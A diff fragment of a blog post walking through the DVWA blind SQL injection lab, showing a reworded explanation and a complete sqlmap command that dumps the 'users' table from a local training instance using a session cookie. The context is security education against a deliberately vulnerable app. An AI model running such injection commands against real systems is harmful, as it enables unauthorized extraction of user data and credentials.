CSpanias/cspanias.github.io/_posts/2023-12-14-DVWA - SQL Injection (Blind).md

     [*] ending @ 10:38:55 /2023-12-14/
     ```

 3. In just 1 second(!) we managed to found out the there are two tables: `guestbook` and `users`.
 Now all we have to do is to extract information from the `users` table (`-T users`).
-We also added the `--dump` option so it actually shows us what it have found:
+We also added the `--dump` option which instructs SQLMap to dump the DBMS database table entries so we can directly see the table's content:

     ```shell
     $ sqlmap --url="http://127.0.0.1:42001/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=tnusaaspju33gd737338bcnhrl; security=low" --data="id=1&Submit=Submit" -p id -T users --batch --threads 5 --dump